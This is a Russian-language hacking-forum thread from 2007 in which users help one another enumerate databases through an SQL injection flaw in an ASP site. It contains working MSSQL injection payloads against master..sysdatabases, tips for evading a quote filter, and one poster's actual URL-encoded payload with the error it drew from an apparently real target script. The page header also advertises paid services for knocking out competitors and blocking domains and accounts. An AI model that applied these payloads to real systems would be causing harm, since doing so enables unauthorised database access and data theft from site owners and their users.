MSSQL Injection вопрос

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
MSSQL Injection вопрос

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

MSSQL Injection вопрос

16.08.2007, 15:49

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

С нами: 10171046

Репутация: -12

MSSQL Injection вопрос

Каким методом можно получить список существующих баз данных?

𝕏 Twitter Reddit Telegram Копировать ссылку

16.08.2007, 15:55

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

С нами: 11217866

Репутация: 3812

Отправить сообщение для +toxa+ с помощью AIM

show databases;

__________________

16.08.2007, 16:03

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

С нами: 10171046

Репутация: -12

Это не то. Мне через багу в скрипте надо узнать все существующие базы.

запрос типа .asp?ID=1'INJECTION

16.08.2007, 16:36

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

http://hack-shop.org.ru/board/showthread.php?t=24

Цитата:

select top 1 name from master..sysdatabases

16.08.2007, 16:55

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

С нами: 10171046

Репутация: -12

спасибо, помог

Только что-то select top 2 start at 1 не пашет

на единицу ругается Incorrect syntax near '1'

16.08.2007, 17:27

ShAnKaR

Постоянный

Регистрация: 14.07.2005

Сообщений: 964

С нами: 10960226

Репутация: 1424

чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

16.08.2007, 17:31

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

С нами: 10171046

Репутация: -12

Цитата:

Сообщение от ShAnKaR

чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

я знаю, но кавычки ставить нельзя.

16.08.2007, 17:58

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

Цитата:

select top 2 start at 1 не пашет

Запрос гласит вывести 2 строчки начиная с 1

16.08.2007, 17:59

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

Цитата:

я знаю, но кавычки ставить нельзя.

можно использывать order by checksum

#10

16.08.2007, 19:09

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

С нами: 10171046

Репутация: -12

-1+or+1=(select+top+1+start+at+2+name+from+master.. sysdatabases)--

ответ:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '1'.

/newsstory.asp, line 15

что означает, это выражение я понял, не могу понять в чем ошибка синтаксиса

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters	bxN5	Forum for discussion of ANTICHAT	1	09.04.2007 19:07

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход